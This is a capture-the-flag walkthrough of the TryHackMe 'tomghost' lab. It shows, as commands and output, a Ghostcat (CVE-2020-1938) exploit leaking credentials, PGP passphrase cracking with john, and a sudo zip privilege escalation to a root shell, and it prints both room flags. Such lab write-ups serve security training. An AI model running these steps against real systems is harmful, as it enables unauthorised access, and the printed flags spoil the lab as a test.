In this walk through, we will be going through the tomghost room from Tryhackme. This room is rated as easy on the platform and the objective is to identify recent vulnerabilities in order to exploit the system or read files that we should not have access to. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | tomghost |
IPaddress | 10.10.203.67 |
Difficulty | Easy |
Objective | Identify recent vulnerabilities to try exploit the system or read files that you should not have access to. |
Enumeration:
- Checking if machine is live or not.
- I started with a normal Nmap scan with version detection.
sudo nmap -sS -sV 10.10.222.43
- Next, i used gobuster to perform directory bruteforcing to reveal some juicy directories.
wh1terose@fsociety:~$ gobuster dir -u http://10.10.222.43:8080/ -w ~/Desktop/Wordlist/common.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.222.43:8080/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /home/wh1terose/Desktop/Wordlist/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2023/04/13 21:02:54 Starting gobuster in directory enumeration mode =============================================================== /docs (Status: 302) [Size: 0] [--> /docs/] /examples (Status: 302) [Size: 0] [--> /examples/] /favicon.ico (Status: 200) [Size: 21630] /host-manager (Status: 302) [Size: 0] [--> /host-manager/] /manager (Status: 302) [Size: 0] [--> /manager/] =============================================================== 2023/04/13 21:04:31 Finished ===============================================================
- Googling the exact “Apache Tomcat 9.0.30 vulnerabilities”. We found one – CVE-2020-1938 (Ghostcat)
Exploit: https://github.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat
- Firing off the exploit, we found a potential username and password combinations beneath the Welcome section. We can now use it to get our initial access via SSH.
wh1terose@fsociety:~/CTF/TryHackme/tomghost/Hacking-Vulnerability-CVE-2020-1938-Ghostcat$ python2 CVE-2020-1938.py 10.10.222.43 -p 8009 -f WEB-INF/web.xml Getting resource at ajp13://10.10.222.43:8009/asdf ---------------------------- <?xml version="1.0" encoding="UTF-8"?> <!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd" version="4.0" metadata-complete="true"> <display-name>Welcome to Tomcat</display-name> <description> Welcome to GhostCat skyfuck:8730281lkjlkjdqlksalks </description> </web-app>
Gaining Access:
- Let’s login into the server with SSH using the below credentials.
Creds: skyfuck:8730281lkjlkjdqlksalks
- Found two files one .asc file and the other a .pgp one. We will target the .asc file as it contain a private key.
skyfuck@ubuntu:~$ ls credential.pgp tryhackme.asc skyfuck@ubuntu:~$ cat tryhackme.asc -----BEGIN PGP PRIVATE KEY BLOCK----- Version: BCPG v1.63 lQUBBF5ocmIRDADTwu9RL5uol6+jCnuoK58+PEtPh0Zfdj4+q8z61PL56tz6YxmF 3TxA9u2jV73qFdMr5EwktTXRlEo0LTGeMzZ9R/uqe+BeBUNCZW6tqI7wDw/U1DEf StRTV1+ZmgcAjjwzr2B6qplWHhyi9PIzefiw1smqSK31MBWGamkKp/vRB5xMoOr5 ZsFq67z/5KfngjhgKWeGKLw4wXPswyIdmdnduWgpwBm4vTWlxPf1hxkDRbAa3cFD B0zktqArgROuSQ8sftGYkS/uVtyna6qbF4ywND8P6BMpLIsTKhn+r2KwLcihLtPk V0K3Dfh+6bZeIVam50QgOAXqvetuIyTt7PiCXbvOpQO3OIDgAZDLodoKdTzuaXLa cuNXmg/wcRELmhiBsKYYCTFtzdF18Pd9cM0L0mVy/nfhQKFRGx9kQkHweXVt+Pbb 3AwfUyH+CZD5z74jO53N2gRNibUPdVune7pGQVtgjRrvhBiBJpajtzYG+PzBomOf RGZzGSgWQgYg3McBALTlTlmXgobn9kkJTn6UG/2Hg7T5QkxIZ7yQhPp+rOOhDACY hloI89P7cUoeQhzkMwmDKpTMd6Q/dT+PeVAtI9w7TCPjISadp3GvwuFrQvROkJYr WAD6060AMqIv0vpkvCa471xOariGiSSUsQCQI/yZBNjHU+G44PIq+RvB5F5O1oAO <-- snipped --> -----END PGP PRIVATE KEY BLOCK-----
- Cracking the gpg file using john. First I convert the file to john crackable format using gpg2john and then fired john on it.
wh1terose@fsociety:~/CTF/TryHackme/tomghost$ gedit hash.txt wh1terose@fsociety:~/CTF/TryHackme/tomghost$ ~/Tools/john/run/gpg2john hash.txt > crack File hash.txt wh1terose@fsociety:~/CTF/TryHackme/tomghost$ ls crack Hacking-Vulnerability-CVE-2020-1938-Ghostcat hash.txt wh1terose@fsociety:~/CTF/TryHackme/tomghost$ ~/Tools/john/run/john crack Using default input encoding: UTF-8 Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64]) Cost 1 (s2k-count) is 65536 for all loaded hashes Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes Will run 8 OpenMP threads Proceeding with single, rules:Single Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status Almost done: Processing the remaining buffered candidate passwords, if any. 0g 0:00:00:00 DONE 1/3 (2023-04-13 21:53) 0g/s 21405p/s 21405c/s 21405C/s Comstuxnet1900..Cstuxnet1900 Proceeding with wordlist:/home/wh1terose/Tools/john/run/password.lst Enabling duplicate candidate password suppressor alexandru (tryhackme) 1g 0:00:00:00 DONE 2/3 (2023-04-13 21:53) 1.052g/s 21303p/s 21303c/s 21303C/s rooney..blahblah1 Use the "--show" option to display all of the cracked passwords reliably Session completed.
- GPG password: alexandru
- Decrypting the pgp file using the above cracked password.
skyfuck@ubuntu:~$ gpg -d credential.pgp You need a passphrase to unlock the secret key for user: "tryhackme <[email protected]>" 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 (main key ID C6707170) gpg: gpg-agent is not available in this session gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences gpg: encrypted with 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 "tryhackme <[email protected]>" merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123jskyfuck@ubuntu:~$
Merlin password: asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j
Privilege Escalation:
- First I check if there is any file that we can run as sudo and found one.
merlin@ubuntu:/$ sudo -l Matching Defaults entries for merlin on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User merlin may run the following commands on ubuntu: (root : root) NOPASSWD: /usr/bin/zip
- Using GTFO bins to elevate our privilege using the zip binary.
merlin@ubuntu:/$ TF=$(mktemp -u) merlin@ubuntu:/$ sudo /usr/bin/zip $TF /etc/hosts -T -TT 'sh #' adding: etc/hosts (deflated 31%) # id uid=0(root) gid=0(root) groups=0(root) # whoami root # pwd / # cd root # ls root.txt ufw # cat root.txt THM{Z1P_1S_FAKE}
Task 1 – Flags
Question 1 – Compromise this machine and obtain user.txt
THM{GhostCat_1s_so_cr4sy}
Question 2 – Escalate privileges and obtain root.txt
THM{Z1P_1S_FAKE}
Also Read: Tryhackme – The Cod Caper
Conclusion:
So that was “tomghost” for you. Let’s sum it up quickly. We started off with a regular nmap scan with version detection, found two ports opened – 22 (SSH) and 8080 (Apache Tomcat). Next, we fired gobuster to perform some directory bruteforcing to reveal some juicy directories. Moving on, i looked for known exploits for Apache Tomcat 9.0.30 and found a CVE-2020-1938 (Ghostcat). Using the exploit got the credentials to logged into the server and got initial access. Once inside, found two files one .asc file and the other a .pgp one. Converted and cracked the .asc file with john and used that password to access the .pgp file which reveals the user merlin and its password. At last, used zip binary sudo misconfiguration to escalate our privileges to get the root flag and the hair of the neighbor’s black cat for our voodo procedure. On that note, i will take your leave and will see you in next one, Till then “Hack the Planet”.